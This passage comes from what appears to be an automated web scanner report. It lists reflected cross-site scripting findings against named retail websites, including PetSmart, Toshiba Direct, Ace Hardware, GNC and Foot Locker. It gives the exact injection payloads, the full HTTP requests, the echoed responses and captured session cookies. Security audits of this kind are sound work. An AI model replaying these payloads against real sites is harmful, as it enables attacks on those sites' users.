Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>3105c4c3d6e=1 -->
...[SNIP]...

5.67. http://www.petsmart.com/ [rdir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25e8c--><script>alert(1)</script>dc42a180bb was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?rdir=1A25e8c--><script>alert(1)</script>dc42a180bb HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>dc42a180bb -->
...[SNIP]...

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 105bc--><script>alert(1)</script>2e44051ff6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:19:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script>alert(1)</script>2e44051ff6d=1 -->
...[SNIP]...

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/Shopper/Product.aspx

Issue detail

The value of the UniqueItemId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b89"style%3d"x%3aexpression(alert(1))"588742d80ce was submitted in the UniqueItemId parameter. This input was echoed as 97b89"style="x:expression(alert(1))"588742d80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Shopper/Product.aspx?UniqueItemId=46497b89"style%3d"x%3aexpression(alert(1))"588742d80ce HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d835f'-alert(1)-'82064d64928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 297415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<script language="Java
...[SNIP]...
ults('searchResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_Use
...[SNIP]...

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc89'-alert(1)-'b678a22fbfb was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 296785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<script language="Java
...[SNIP]...
hResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&targ
...[SNIP]...

5.72. http://www.acehardware.com/category/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cbd"><script>alert(1)</script>8eeef5c5ccb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:10 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:17 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview Ti
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=categ519;cat=lawng319;u1=;u2=2;u3=;u4=2568444;u5=http://www.google.com/search?hl=en&q=24cbd"><script>alert(1)</script>8eeef5c5ccb;ord=1;num=96780812?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.73. http://www.acehardware.com/home/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf78"><script>alert(1)</script>2efdd8e8816 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}
Referer: http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bf78"><script>alert(1)</script>2efdd8e8816;ord=1;num=81155747?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.74. http://www.gnc.com/home/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gnc.com
Path:	/home/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd5a"><script>alert(1)</script>3de0fcd614 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/index.jsp HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217
Referer: http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:42 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<IFRAME src="https://fls.doubleclick.net/activityi;src=1877163;type=homep742;cat=homep168;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=6bd5a"><script>alert(1)</script>3de0fcd614;u6=;u7=;ord=1;num=38799404?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.75. http://www.footlocker.com/login/login_form.cfm [TID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.footlocker.com
Path:	/login/login_form.cfm

Issue detail

The value of the TID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d25d0"><script>alert(1)</script>eb65c43451a was submitted in the TID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login/login_form.cfm?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0d25d0"><script>alert(1)</script>eb65c43451a

Response

5.76. http://www.petco.com/ [ResonanceSegment cookie] previous next

Summary

